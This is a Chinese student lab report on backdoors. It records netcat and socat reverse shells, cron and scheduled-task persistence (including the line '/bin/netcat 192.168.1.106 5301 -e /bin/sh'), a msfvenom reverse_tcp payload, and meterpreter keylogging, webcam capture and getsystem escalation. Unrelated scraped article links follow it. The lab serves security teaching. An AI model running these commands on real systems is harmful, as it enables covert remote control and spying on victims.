20145301《网络对抗》Exp2 后门原理与实践

基础问题回答

  1. 例举你能想到的一个后门进入到你系统中的可能方式?

    • 系统或者某些软件自身留下的后门。
    • 钓鱼网站等非正规网站上捆绑下载
  2. 例举你知道的后门如何启动起来(win及linux)的方式?
    • 操作系统自带服务;
    • 网络协议捆绑;
    • 被控端被设置了cron启动,定时循环启动;
    • 被控端被设置了任务计划启动,在被控端达到某个条件时自动运行;
    • 社会工程学等相关方式,比如诱导你自己打开后门软件;
  3. Meterpreter有哪些给你映像深刻的功能?
    • 通过指令可以捕获计算机的摄像头,这样可以在毫无察觉的情况下隐私完全曝光
    • 可以捕获键盘敲击信息,这样,经过识别,无论时聊天记录,还是账号密码都可以被非法获取。
    • 可以直接提升攻击者的权限,获取靶机的shell
  4. 如何发现自己有系统有没有被安装后门?
    • 没有经过免杀处理的常见后门程序会很容易就被杀毒工具发现并清理;
    • 查看开启的端口和对应的进程,发现非默认常见的端口,找到对应的进程,对其行为分析;
    • 下载专门的监控防护软件。

实验总结与体会

  • 在这次实验中体会了一把当“黑客”的感觉,虽然是自己入侵自己,但实验成功的时候还是十分喜悦激动的。也能理解那些当年的爱好者为何能在毫无利益驱动下依然孜孜不倦的做着各种尝试和攻击。而现在的攻击者日渐功利化、专业化、集团化,这就使防范变的更加困难和艰巨。
  • 在这次实验中深刻体会到了计算机系统的脆弱性。短短的几行代码和攻击程序就能将整个电脑占为己用。尤其时大多数人没有足够的防范意识和措施,更加致使现在网络病毒木马后门等程序的泛滥。
  • 在除了从自身做起,提高安全防范意识。比如:不在不安全的网站上下载软件、视频等,定时更新杀软、关闭不需要的端口,定期更新系统及时打上补丁,学会对进程进行查看与操作,及时发现计算机中等异常情况等等等等。还要像身边人宣传这种防范意识,共同抵御安全威胁。

实践过程记录

Windows获得Linux Shell

  • 在Windows下查看IP并监听5301端口

  • 在Kali下,使用nc指令的-e选项反向连接Windows的5301端口:

  • Windows下便可获得Kali的shell:

Linux获得Windows Shell

  • Kali下查看IP:

  • 使用nc指令监听5215端口:

  • Windows使用ncat.exe程序的-e选项项反向连接Kali的5301端口:

  • Kali下可以输入Windows命令:

使用nc传输数据

  • Windows下监听5301端口:

  • Kali下连接到Windows的5301端口,即可开始对话:

(1)使用netcat获取主机操作Shell,cron启动

  • 先在Windows系统下,监听5301端口:

  • 用crontab -e指令编辑一条定时任务,选择vim编辑器:crontab指令可以用于设置周期性被执行的指令

  • 在最后一行添加06 * * * * /bin/netcat 192.168.1.106 5301 -e /bin/sh,在每个小时的第06分钟反向连接Windows主机的5301端口

  • 每当时间到了06分时,便可获得Kali的shell。

(2)使用socat获取主机操作Shell, 任务计划启动

  • 在Windows系统下,打开控制面板-更多-管理工具-任务计划程序,创建任务,并新建一个触发器:

  • 在操作-程序或脚本中选择socat.exe文件的路径,在添加参数一栏填写tcp-listen:5301 exec:cmd.exe,pty,stderr。

  • 创建完成之后,锁定计算机,再次打开时,创建的任务已经开始运行:

  • 此时,在Kali环境下输入指令socat - tcp:192.168.1.106:5301,便成功获得了一个cmd shell:

(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=5301 -f exe > 20145301_backdoor.exe生成后门程序:

  • 通过nc将生成的后门程序传送到Windows主机上:

  • 在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:

  • 设置完成后,执行监听:

  • 打开Windows上的后门程序:

  • 此时Kali上可以远程控制的shell:

(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • record_mic指令可以截获一段音频(但时间非常短...); webcam_snap指令可以使用摄像头进行拍照;webcam stream指令可以使用摄像头进行录像:

  • screenshot指令可以进行截屏:

  • keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令可以读取击键的记录:

  • getuid指令查看当前用户,使用getsystem指令进行提权,如图所示,提权成功

20145301《网络对抗》Exp2 后门原理与实践的更多相关文章

  1. 20155323刘威良 网络对抗 Exp2 后门原理与实践

    20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...

  2. 20155331 丹增旦达 网络攻防 Exp2后门原理与实践

    20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  3. 20155302 Exp2 后门原理与实践

    20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...

  4. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  5. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  6. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  7. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  8. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  9. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

随机推荐

  1. Oracle里 用sql*plus 登陆时,用户名和密码是多少啊?

    Oracle里sql*plus的用户名即system用户,密码是自己设置的密码. 如果密码忘记,可通过如下方法重置. 1.win键+R键,输入cmd,打开命令提示符. 2.输入sqlplus /nol ...

  2. LNMP ftp 可以登录无权限操作?

    服务器环境: LNMP ftp : LNMP ftp一键安装 嘛卖批啊! 解决办法:  登录服务器.执行以下命令 chattr -i /home/wwwroot/default/.user.ini c ...

  3. java基础---->多线程之yield(三)

    yield方法的作用是放弃当前的CPU资源,将它让给其它的任务去占用CPU执行时间.但放弃的时间不确定,有可能刚刚放弃,马上又获得CPU时间片.今天我们通过实例来学习一下yield()方法的使用.最是 ...

  4. 运行npm install出现警告

    如下: 解决: fsevent是mac osx系统的,你是在win或者Linux下使用了 所以会有警告,忽略即可

  5. Weinre 远程调试移动端手机web页面

    调试场景 1.调试页面在手机上.2.调试工具在PC的chrome3.手机跟pc要在同一个网络环境下,也就是都使用一个wifi 一.安装 Weinre 1.Weinre是基于nodejs实现的,所以使用 ...

  6. linux清理n天前的文件命令

    记得有一次面试时问题改问题.现特此记录 find ${DATADIR}/user*.log -type f -mtime +1 -exec rm {} \; DATADIR是自己定义变量 -mtime ...

  7. java jar命令及补丁方法

    用法: jar {ctxui}[vfmn0PMe] [jar-file] [manifest-file] [entry-point] [-C dir] files ...选项: -c 创建新档案 -t ...

  8. pta 习题集5-19 列车厢调度

    1 ====== <--移动方向 / 3 ===== \ 2 ====== -->移动方向 大家或许在某些数据结构教材上见到过"列车厢调度问题"(当然没见过也不要紧). ...

  9. MyBatis 的真正强大在于它的映射语句 如果有一个独立且完美的数据库映射模式,所有应用程序都可以使用它

    mybatis – MyBatis 3 | Mapper XML 文件 http://www.mybatis.org/mybatis-3/zh/sqlmap-xml.html mybatis – My ...

  10. LAMP开发(1)

    apache web服务器软件,最近款的有7兆大小,工作:监听端口,接收请求,解析HTTP协议,转发给PHP比如:当一个客户端的请求发过来的时候,通常客户端(浏览器),请求发送给某一台IP,这个IP肯 ...